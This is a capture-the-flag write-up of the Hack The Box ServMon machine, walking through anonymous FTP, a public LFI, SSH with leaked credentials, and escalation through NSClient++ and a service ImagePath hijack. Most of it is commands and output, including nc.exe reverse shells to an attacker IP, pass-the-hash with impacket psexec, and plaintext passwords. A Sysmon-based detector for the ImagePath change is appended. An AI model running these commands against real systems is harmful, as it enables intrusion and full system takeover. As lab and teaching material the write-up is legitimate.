htb-servmon
As always, we start with an nmap scan.
We can log in to FTP anonymously and find confidential.txt in ftp://10.10.10.184/Nathan:
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
The LFI used to read that file is https://www.exploit-db.com/exploits/47774
So we have the passwords.
L1k3B1gBut7s@W0rk is the password for user Nadine, and it works for SSH:
ssh nadine@10.10.10.184 (password L1k3B1gBut7s@W0rk)
Next we upload nc.exe to the box, then follow https://www.exploit-db.com/exploits/46802 (NSClient++ privilege escalation):
C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
This is the password for the NSClient++ login page on port 8443.
curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat --data-binary "c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe"
or run:
E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.184.....
[*] Found writable share ADMIN$
[*] Uploading file TEhcBLUe.exe
[*] Opening SVCManager on 10.10.10.184.....
[*] Creating service Lofh on 10.10.10.184.....
[*] Starting service Lofh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of c:\Users\Administrator\Desktop

08/04/2020  23:12    <DIR>          .
08/04/2020  23:12    <DIR>          ..
15/04/2020  05:58                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,399,426,048 bytes free

c:\Users\Administrator\Desktop>type root.txt
62fb102b67c0760ac03f1cf05616dc65
c:\Temp>cqh -samdump
SAM hashes:
Another way:
Enumerating the current user shows that it belongs to the "Server Operators" group, which can read and write system services: it can change the configuration of a service that runs as SYSTEM and start it. The idea: find a SYSTEM service that is not running, point its ImagePath at nc.exe (or another payload), and start it:
*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f
The operation completed successfully.
*Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>hostname
hostname
ServMon

C:\WINDOWS\system32>
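Added example, not part of the original writeup: a small detection for the service ImagePath change used above, run over constructed Sysmon Event ID 13 (registry value set) records. The field names follow Sysmon's RegistryEvent layout; the record contents, the user names and the writable-directory list are assumptions made up to mirror the reg add command, not logs from the box.

```python
import re

# Constructed Sysmon Event ID 13 (RegistryEvent: value set) records in Sysmon's
# field layout; made up to mirror the reg add above, not logs from the box.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": r"SERVMON\Nadine",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\SensorDataService\ImagePath",
     "Details": r"C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd"},
    {"EventID": 13, "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\wuauserv\ImagePath",
     "Details": r"%SystemRoot%\system32\svchost.exe -k netsvcs -p"},
    {"EventID": 13, "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\nscp\ImagePath",
     "Details": r'"C:\Program Files\NSClient++\nscp.exe" service --run'},
]

IMAGEPATH_RE = re.compile(
    r"^HKLM\\System\\(?:CurrentControlSet|ControlSet\d+)\\Services\\([^\\]+)\\ImagePath$",
    re.IGNORECASE)

# Directories a low-privileged user can normally write to (assumed list); a
# service binary there can be swapped by that user, so the write is an alert.
WRITABLE_PREFIXES = ("c:\\windows\\temp\\", "c:\\temp\\", "c:\\users\\", "c:\\programdata\\")

# Common REG_EXPAND_SZ variables, expanded so the prefix check sees real paths.
ENV = {"%systemroot%": r"C:\Windows", "%windir%": r"C:\Windows"}

def executable_from_imagepath(value: str) -> str:
    """Strip arguments and quotes from an ImagePath value and expand variables."""
    value = value.strip()
    exe = value[1:].split('"', 1)[0] if value.startswith('"') else value.split(" ", 1)[0]
    for var, real in ENV.items():
        exe = re.sub(re.escape(var), lambda _: real, exe, flags=re.IGNORECASE)
    return exe

def check_event(event: dict) -> "str | None":
    """Alert when an ImagePath write points a service at a user-writable path."""
    if event.get("EventID") != 13:
        return None
    m = IMAGEPATH_RE.match(event.get("TargetObject", ""))
    if not m:
        return None
    exe = executable_from_imagepath(event.get("Details", ""))
    if exe.lower().startswith(WRITABLE_PREFIXES):
        return f"service {m.group(1)} ImagePath set to {exe} by {event.get('User')}"
    return None

def scan(events: list) -> list:
    """Run check_event over a batch of records and return only the alerts."""
    return [a for a in (check_event(e) for e in events) if a]
```

Only the SensorDataService record fires; the svchost.exe and nscp.exe paths resolve to non-writable directories after variable expansion and quote handling, so normal service maintenance stays quiet.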
…
Author : Puckiestyle